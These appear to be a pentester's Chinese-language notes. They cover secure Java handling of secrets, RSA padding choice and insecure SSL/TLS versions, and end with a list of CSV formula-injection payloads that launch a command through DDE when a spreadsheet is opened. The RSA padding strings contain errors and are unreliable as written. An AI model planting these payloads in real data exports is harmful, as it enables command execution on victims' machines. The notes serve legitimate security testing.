【渗透测试】payload记录

Java开发使用char[]代替String保存敏感数据

Java Jvm会提供内存转储功能，当Java程序dump后，会生成堆内存的快照，保存在.hprof后缀的文件中，进而导致敏感信息的泄露。char[]可以在存储敏感数据后手动清零，String对象会永久保存数据，即便被置为空也会保存在内存中，知道垃圾回收机制将其回收。

加密算法的填充

应该使用OAEP模式而不应该使用PKCS1模式。
通常写法如下：

RSA/ECB/OAEPWithSHA-1AndGF1Padding
RSA/ECB/OAEPWithSHA-1AndMGFPadding
RSA/ECB/PKCS1Padding(禁用)

不安全协议/加密套件

1. SSL/TLS版本：
   • SSL(2.0/3.0) 也可以称为SSLv2/SSLv3
   • TLS(1.0/1.1/1.2/1.3)也可以称TLSv1/TLSv1.1/TLSv1.2/TLSv1.3
2. 存在的问题
   • SSL2.0
     • 使用MD5作为消息认证码
     • 握手消息未受保护
     • 加密和消息认证使用相同的密钥
   • SSL3.0
     • 数据记录协议受到POODLE攻击
     • 密钥交换时易受中间人攻击
   • TLS1.0
     • 对称加密仅支持RC4和CBC模式

CSV注入

可以使用的payload

=cmd|'/c calc'!A1
+=cmd|'/c calc'!A1
\",=cmd|'/c calc'!A1
",=cmd|'/c calc'!A1
@ABS(cmd|'/c calc'!A1)
-cmd|'/c calc'!A1
xxx, =cmd|'/c calc'!A1
xxx\n =cmd|'/c calc'!A1
xxx;=cmd|'/c calc'!A1